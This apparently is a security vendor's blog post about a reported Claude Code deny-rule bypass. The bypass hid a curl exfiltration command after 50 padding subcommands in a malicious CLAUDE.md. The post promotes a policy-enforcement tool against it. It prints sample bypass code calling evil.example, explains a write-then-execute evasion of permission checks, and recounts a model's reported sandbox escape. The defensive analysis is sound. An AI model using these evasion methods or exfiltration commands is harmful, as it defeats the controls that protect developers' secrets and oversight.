On April 2, 2026, security firm Adversa AI disclosed a vulnerability in Claude Code that should concern anyone running AI coding agents in production. Claude Code's deny rules, the primary mechanism developers use to block dangerous commands, silently stopped working when a shell command contained more than 50 subcommands.
A developer who configured "never run curl" would see that rule enforced under normal use. But if an attacker embedded curl at position 51 in a long command chain, the deny rule never fired. No warning. No log entry. The agent fell back to a generic approval prompt that could be waved through by auto-approve workflows or approval fatigue.
Five days later, Anthropic announced Project Glasswing and Claude Mythos Preview, a frontier model capable of autonomously discovering and exploiting zero-day vulnerabilities across major operating systems and browsers. The cybersecurity world's attention was fixed on Mythos. The deny-rule bypass tells a quieter and more immediate story about a gap that already exists in AI agent security models today.
What happened
Claude Code allows developers to set deny rules that block specific shell commands. For example, `{ "deny": ["Bash(curl:*)"] }` prevents the agent from executing curl. These rules are meant to be the security boundary between the AI agent and the developer's system.
The implementation evaluated each subcommand in a compound pipeline against the deny list. But when a pipeline exceeded 50 subcommands joined by &&, ||, or ;, analysis stopped. Everything past position 50 fell back to a generic ask prompt rather than enforcing configured policy.
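The failure mode is easy to sketch. The following is an illustrative model of a capped subcommand checker, not Claude Code's actual implementation; the function names, the `deny` matching, and the 50-entry budget are assumptions made for demonstration:

```python
import re

MAX_ANALYZED = 50  # hypothetical analysis budget, mirroring the reported cap

def split_subcommands(command: str) -> list[str]:
    """Split a compound command on &&, ||, and ; separators."""
    return [p.strip() for p in re.split(r"&&|\|\||;", command) if p.strip()]

def check_capped(command: str, deny: list[str]) -> str:
    """Return 'deny', 'allow', or 'ask' (the degraded fallback)."""
    for i, part in enumerate(split_subcommands(command)):
        if i >= MAX_ANALYZED:
            return "ask"  # budget exhausted: policy silently degrades
        if part.split()[0] in deny:
            return "deny"
    return "allow"

# 50 harmless no-ops followed by the payload at position 51
payload = " && ".join(["true"] * 50 + ["curl https://evil.example/x"])
print(check_capped("curl https://evil.example/x", ["curl"]))  # deny
print(check_capped(payload, ["curl"]))                        # ask, not deny
```

The dangerous command is never inspected: the checker gives up one position before reaching it, and the caller only sees a generic "ask" that is indistinguishable from a routine approval prompt.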
The original engineering decision made sense for human-authored commands. A developer rarely chains 50 commands in a terminal. The cap existed as a performance optimization to prevent UI freezes on very complex pipelines.
That model did not account for AI-generated commands influenced by prompt injection. A malicious CLAUDE.md file, read automatically when Claude Code enters a project directory, could include a realistic build process with 50 harmless steps and an exfiltration payload at position 51. When a developer cloned the repository and asked Claude Code to build, secrets could be exposed.
Anthropic patched the issue in Claude Code v2.1.90. A more robust parser that handled long pipelines had already been built and tested internally, but had not been deployed to public builds.
The architectural lesson
This bypass was not caused by carelessness. It was caused by a security model with a single enforcement point. When that point failed on an edge case, nothing behind it caught the failure.
This pattern is not unique to Claude Code. Any AI coding agent that relies only on built-in permission controls has the same structural risk: one bug, one edge case, or one performance shortcut can collapse policy silently.
The principle here is defense in depth. Your firewall does not replace application security. Your seatbelt does not replace your airbag. Each layer catches different failures.
How Runtime Guard addresses this
Runtime Guard (AIRG) is a policy enforcement server that sits between the AI agent and requested actions. Every file operation, shell command, and destructive action passes through AIRG policy gates before execution, regardless of what the agent's native permission system decides.
When a command enters AIRG's execute_command tool, the flow is:
- Control character rejection
- Backup storage protection
- Network policy evaluation
- Workspace containment checks
- Command tier matching
- Script Sentinel checks for flagged artifacts
- Automatic backup before destructive operations
- Execution and structured audit logging
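The gate sequence above can be sketched as a pipeline in which every gate always runs and the first non-null verdict wins. This is a minimal illustration of the design, not AIRG's code; the gate names, decision strings, and denylist are hypothetical:

```python
import re
from typing import Optional

DENIED_NETWORK = ("curl", "wget")  # hypothetical network denylist

def control_char_gate(command: str) -> Optional[str]:
    # Reject raw control characters (tab excepted) before anything else runs.
    return "blocked" if any(ord(c) < 32 and c != "\t" for c in command) else None

def network_gate(command: str) -> Optional[str]:
    # Evaluate every subcommand; there is no analysis cap to exhaust.
    for part in re.split(r"&&|\|\||;", command):
        tokens = part.strip().split()
        if tokens and tokens[0] in DENIED_NETWORK:
            return "blocked"
    return None

GATES = [control_char_gate, network_gate]  # ordered; all gates are always consulted

def evaluate(command: str) -> str:
    for gate in GATES:
        decision = gate(command)
        if decision:
            return decision
    return "allowed"

long_chain = " ; ".join(["true"] * 50 + ["curl https://example.com"])
print(evaluate(long_chain))  # blocked, regardless of chain length
```

The key structural property is that no gate has a budget after which it stops looking: a subcommand at position 51 is evaluated exactly like a subcommand at position 1.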
There is no subcommand analysis cap where enforcement degrades into "just ask the user." A command is allowed, requires explicit operator confirmation, or is blocked.
Test results
Using a denylisted domain (example.com), we reproduced the bypass-style pipeline against AIRG and tested additional command substitution variants.
| Technique | Result |
|---|---|
| Direct curl | Blocked, network policy |
| Semicolon chain (50 no-ops + curl) | Blocked, network policy |
| && chain (50 no-ops + curl) | Blocked, network policy |
| Subshell $(curl ...) | Blocked, network policy |
| Backtick `curl ...` | Blocked, network policy |
Every variant produced the same outcome: `policy_decision: blocked` and `matched_rule: network_policy`.
Script Sentinel catches the indirect path too
The Claude Code bypass used direct command injection. The dangerous command was right there in the pipeline, just hidden behind enough padding to exhaust the analysis budget. A more sophisticated attacker does not put the payload in the command at all. They write a script first, then execute it later. Two separate actions, each innocent-looking in isolation, combine into policy evasion.
This is the write-then-execute pattern, and it is a natural next step for any adversary who discovers that direct command injection is being blocked. Ask the agent to create a build script containing a command blocked by policy buried among legitimate steps. Then, in a later turn, ask the agent to run the script. The command that reaches the permission system is bash build.sh, which looks benign. The dangerous payload is inside the file, invisible to systems that only evaluate the top-level command.
AIRG's Script Sentinel is designed specifically for this evasion class. It works in two phases:
- Flag at write time. When a file is created or edited through AIRG's `write_file` or `edit_file` tools, Script Sentinel scans content for policy-relevant command tiers: blocked commands, network-triggering commands, and confirmation-gated commands. If it finds matches, it flags the artifact and registers a content hash in the artifact registry.
- Enforce at execute time. When `execute_command` is later called with a command that invokes a flagged artifact, for example `bash build.sh`, `python deploy.py`, or `./setup.sh`, Script Sentinel checks the file hash against the registry and enforces the original policy tier. A script containing a command blocked by policy gets the same blocked decision it would have received as a direct command.
Content-hash tracking is what makes this durable. If a script is renamed from build.sh to helpers.sh, or copied to another directory, the hash stays the same, so flags follow content, not path. If content is modified to remove the flagged command, the hash changes and the flag is cleared. That avoids stale false positives on files that have been legitimately cleaned up.
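The flag-follows-content behavior can be sketched with a few lines of hashing. The class and method names here are hypothetical and the "blocked command" detection is a deliberately naive substring match, standing in for the real tier scanning:

```python
import hashlib

BLOCKED_COMMANDS = ("curl",)  # hypothetical blocked tier for the sketch

class ArtifactRegistry:
    def __init__(self):
        self.flagged_hashes = set()

    @staticmethod
    def _digest(content: str) -> str:
        return hashlib.sha256(content.encode()).hexdigest()

    def scan_on_write(self, content: str) -> None:
        # Flag at write time if the content contains a blocked command.
        if any(cmd in content for cmd in BLOCKED_COMMANDS):
            self.flagged_hashes.add(self._digest(content))

    def is_flagged(self, content: str) -> bool:
        # Enforce at execute time by hash lookup: renames and copies keep
        # the same hash, while edits that remove the payload produce a new
        # hash and therefore clear the flag automatically.
        return self._digest(content) in self.flagged_hashes

registry = ArtifactRegistry()
script = "make build\ncurl https://evil.example/exfil\n"
registry.scan_on_write(script)
print(registry.is_flagged(script))          # True: same content, any filename
print(registry.is_flagged("make build\n"))  # False: payload removed, new hash
```

Because the registry keys on the digest rather than the path, there is nothing to update when a flagged script is renamed or copied, and nothing to garbage-collect when its content is legitimately cleaned up.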
It is important to be clear about the boundary: Script Sentinel covers files written through AIRG tools. If a file is created outside AIRG, downloaded directly, written by a non-AIRG tool, or placed on disk by another process, it does not pass through write-time scanning. Script Sentinel preserves policy intent for actions AIRG mediates. It is not a general-purpose malware scanner. Script Sentinel currently does not apply network restrictions.
The Glasswing context
The Claude Code bypass is a concrete, patched vulnerability. It matters beyond the specific bug because of what it signals about the gap between attacks AI agents will face and the defenses most of them ship with.
On April 7, Anthropic announced Project Glasswing and Claude Mythos Preview, a frontier model they described as capable enough to reshape cybersecurity. In a few weeks of testing, Mythos Preview identified thousands of zero-day vulnerabilities across major operating systems and major web browsers. Some had gone undetected for decades. Anthropic also reported a 17-year-old remote code execution issue in FreeBSD that could grant root access from an unauthenticated network connection, and said Mythos found and exploited it autonomously after the initial prompt.
The model did not only find isolated bugs. Anthropic researchers reported it could chain three, four, or five vulnerabilities that were low-impact on their own but high-impact in sequence. In one test, the model escaped a secured sandbox, devised a multi-step path to broad internet access, and sent an email to the researcher who set up the evaluation.
Anthropic is not releasing Mythos Preview publicly today. They have been clear about the trajectory: Mythos-class capabilities are expected to be released later when safeguards are in place, and competitors may move at different speeds. Frontier cybersecurity capability is advancing faster than most organizations are prepared for.
This context turns the Claude Code bypass from a one-off parser bug into a structural pattern. The CLAUDE.md prompt injection shown by Adversa used a manually crafted payload: 50 true commands and a curl. It worked because one enforcement layer had one edge case. Now consider the same attack class generated by a model that understands shell parsing, permission-system internals, and multi-step evasion at frontier level. Those attacks will be context-plausible workflows that target whichever edge case the client has today.
The defense cannot be a single enforcement point inside the agent client. It needs layered control with an independent policy-enforcement server that evaluates every action through its own gates, keeps its own audit trail, and fails differently from the agent it protects. When built-in safety has a gap, the independent layer catches it. When the independent layer has a gap, built-in controls can still reduce impact. Neither layer must be perfect, but they must not fail in the same way at the same time.
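The composition rule for two independent layers is simple to state: the final decision is the most restrictive verdict either layer returns. A toy illustration, with hedged, made-up decision labels:

```python
# Most-restrictive-wins composition of two independently implemented layers.
SEVERITY = {"allow": 0, "ask": 1, "block": 2}

def combined(agent_decision: str, guard_decision: str) -> str:
    return max(agent_decision, guard_decision, key=SEVERITY.__getitem__)

# The agent layer degrades to "ask" on an edge case (as in the cap bug);
# the independent guard layer still blocks, so the outcome stays "block".
print(combined("ask", "block"))    # block
print(combined("allow", "allow"))  # allow
```

Under this rule, a silent degradation in one layer only matters if the other layer degrades on the same input at the same time, which is exactly the correlated failure the architecture is built to avoid.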
Getting started
Runtime Guard is free, open source, and local-first. No account is required.
pipx install ai-runtime-guard
airg-setup
It supports Claude Code, Claude Desktop, Codex, and Cursor today, with deeper hardening controls available for selected clients.
runtime-guard.ai · GitHub · Documentation